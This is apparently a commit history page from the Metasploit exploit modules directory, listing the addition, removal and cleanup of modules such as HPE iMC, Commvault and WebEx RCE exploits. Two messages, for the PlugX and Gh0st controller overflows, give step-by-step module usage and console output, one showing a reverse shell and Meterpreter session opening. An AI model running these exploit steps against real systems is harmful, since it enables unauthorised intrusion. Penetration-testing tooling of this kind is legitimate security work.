Commit Graph

515 Commits (e6c4fb1dab7e47482ecce10bb5786c3214880d8c)

Author SHA1 Message Date
Wei Chen dd737c3bc8
Land #9317, remove multiple deprecated modules
Land #9317

The following modules are replaced by the following:

auxiliary/scanner/discovery/udp_probe
is replaced by:
auxiliary/scanner/discovery/udp_sweep

exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
is replaced by:
exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload

exploit/windows/misc/regsvr32_applocker_bypass_server
is replaced by:
exploits/multi/script/web_delivery
2018-01-10 15:47:20 -06:00
Wei Chen 777e383568
Land #9377, Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit
Land #9377
2018-01-09 13:56:53 -06:00
Wei Chen a0c9cdd73d
Land #9376, Add HPE iMC dbman RestartDB Unauthenticated RCE exploit
Land #9376
2018-01-09 13:28:03 -06:00
Wei Chen d138f1508c
Land #9340, Add exploit for Commvault Remote Command Injection
Land #9340
2018-01-07 12:17:26 -06:00
Brendan Coles 006514864b Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit 2018-01-05 11:28:48 +00:00
Brendan Coles 52a5fc9e0a Add HPE iMC dbman RestartDB Unauthenticated RCE exploit 2018-01-05 11:28:14 +00:00
h00die 4dacc70b9a slight updates to magentproc docs 2017-12-29 16:35:12 -05:00
h00die b698095c49 slight updates to magentproc docs 2017-12-29 16:30:32 -05:00
b0yd ec7625af9f Damn spaces... 2017-12-22 10:57:11 -05:00
b0yd 2b33b88fa4 Damn spaces 2017-12-22 10:54:31 -05:00
b0yd e088c95a99 Module Cleanup 2017-12-22 10:51:01 -05:00
b0yd d657a9dc53 Commvault Remote Command Injection 2017-12-22 10:04:13 -05:00
Jon Hart a2c5cc0ffb
Remove old deprecated modules 2017-12-19 07:56:16 -08:00
Patrick Webster d95b333ae9 Added exploit module for HP LoadRunner command exec vuln CVE-2010-1549. 2017-11-09 03:59:18 +11:00
Patrick Webster 2f6da89674 Change author name to nick. 2017-11-09 03:00:24 +11:00
Jeffrey Martin f2cba8d920
Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
This restores the original PR
2017-10-25 16:29:11 -05:00
Jeffrey Martin ca28abf2a2 Revert "Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)"
This reverts commit 4999606b61, reversing
changes made to 4274b76473.
2017-10-25 16:19:14 -05:00
Jeffrey Martin 4999606b61 Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary) 2017-10-25 12:44:04 -05:00
h00die 30f833f684 80 pages left 2017-09-13 22:03:34 -04:00
g0tmi1k b884705a93 regsvr32_applocker_bypass_server -> web_delivery 2017-09-06 12:35:52 +01:00
h00die d05c401866 modules cleanup and add docs 2017-09-04 20:57:23 -04:00
Professor-plum 055d64d32b Fixed to modules as suggested from upstream
fixed typo in xtreme.rb when communicating with C&C
removed self.class from options on all three modules
added line to log path where loot has been stored in xtreme.rb
2017-07-30 10:14:05 -06:00
Professor-plum 99546330f1 Added PlugX Controller Stack Overflow Module
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.

## Verification
Run the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing.

- [ ] use exploit/windows/misc/plugx
- [ ] set RHOST [ip of target]
- [ ] set target 1
- [ ] exploit
- [ ] acknowledge the "PeDecodePacket" message on the target

Sample output:
```
msf> use exploit/windows/misc/plugx 
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > check

[*] 192.168.161.128:13579 - "\x03\xB0\x02\x00\x04\x00"
[*] 192.168.161.128:13579 The target appears to be vulnerable.
msf exploit(plugx) >
2017-07-29 10:36:42 -06:00
Professor-plum c336daec8d Added Gh0st Controller Buffer Overflow Module
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution 

## Verification
Run the Gh0st C2 server on a target windows machine. The sample 0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c is a Gh0st 3.6 server that works good for testing.

- [ ] use exploit/windows/misc/gh0st
- [ ] set RHOST [ip of target]
- [ ] exploit

Sample output:
```
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(gh0st) > exploit

[*] Started reverse TCP handler on 192.168.161.1:4444 
[*] 192.168.161.128:80 - Trying target Gh0st Beta 3.6
[*] 192.168.161.128:80 - Spraying heap...
[*] 192.168.161.128:80 - Trying command 103...
[*] Sending stage (957487 bytes) to 192.168.161.128
[*] Meterpreter session 1 opened (192.168.161.1:4444 -> 192.168.161.128:49161) at 2017-07-29 10:11:4
2017-07-29 10:21:05 -06:00
Brent Cook 6300758c46 use https for metaploit.com links 2017-07-24 06:26:21 -07:00
g0tmi1k 524373bb48 OCD - Removed un-needed full stop 2017-07-21 07:41:51 -07:00
g0tmi1k b8d80d87f1 Remove last newline after class - Make @wvu-r7 happy 2017-07-19 11:19:49 +01:00
g0tmi1k a008f8e795 BruteForce - > Brute Force 2017-07-19 10:39:58 +01:00
g0tmi1k 4720d1a31e OCD fixes - Spaces 2017-07-14 08:46:59 +01:00
g0tmi1k fd843f364b Removed extra lines 2017-07-14 08:17:16 +01:00
g0tmi1k 424522147e OCD fixes - Start of *.rb files 2017-07-13 23:53:59 +01:00
William Vu 64452de06d Fix msf/core and self.class msftidy warnings
Also fixed rex requires.
2017-05-03 15:44:51 -05:00
William Webb e96013cd0f
Land #7781, IBM Websphere Java Deserialization RCE 2017-03-14 17:21:18 -05:00
wizard32 78ff7a8865 Module renamed
Renamed from websphere_java_deserialize.rb to ibm_websphere_java_deserialize.rb
2017-03-13 08:22:24 +02:00
wchen-r7 5d0b532b20 Fix #8002, Use post/windows/manage/priv_migrate instead of migrate -f
Because migrate -f uses a meterpreter script, and meterpreter scripts
are deprecated, we should be replacing with a post module

Fix #8002
2017-02-23 17:04:36 -06:00
William Webb dd60fc3598
move cisco_webex_ext to exploits/windows/browser/ 2017-01-27 16:59:20 -06:00
William Webb 94f9971300
add module doc and remove the word EXPLOIT from document title 2017-01-26 13:36:18 -06:00
William Webb d87cb4b085
nfi why i didnt set ssl by default 2017-01-25 21:02:34 -06:00
William Webb ad0e2c7d95
remove extraneous warning alerts 2017-01-25 18:53:54 -06:00
William Webb d2bc8c7f7e
msftidy complaints 2017-01-25 18:24:10 -06:00
William Webb 10066e0c16
get your targets straight son 2017-01-25 18:21:58 -06:00
William Webb d4b18bb3b9
initial commit of webex rce mod 2017-01-25 18:03:19 -06:00
wizard32 467a476598 Update websphere_java_deserialize.rb 2017-01-08 13:33:01 +02:00
wizard32 829f7da7e0 Update websphere_java_deserialize.rb 2017-01-06 18:39:04 +02:00
wizard32 538a1bf21d 'WfsDelay' Option added
20sec added on 'WfsDelay' Option for first time exploit run due to the delay of powershell to load all the available modules.
2017-01-06 18:11:48 +02:00
wizard32 c55e2e58f0 'raw_headers' Updated 2017-01-05 15:19:17 +02:00
wizard32 1d82ee0470 'raw_headers' field Updated 2017-01-05 15:17:17 +02:00
wizard32 c29a9ac00f Show Info updated 2017-01-05 14:18:38 +02:00
wizard32 1a38caa230 Encode - Decode code Updated 2017-01-05 13:07:34 +02:00
wizard32 9f4be89391 Update websphere_java_deserialize.rb
Update information "Options" field
2017-01-05 12:38:54 +02:00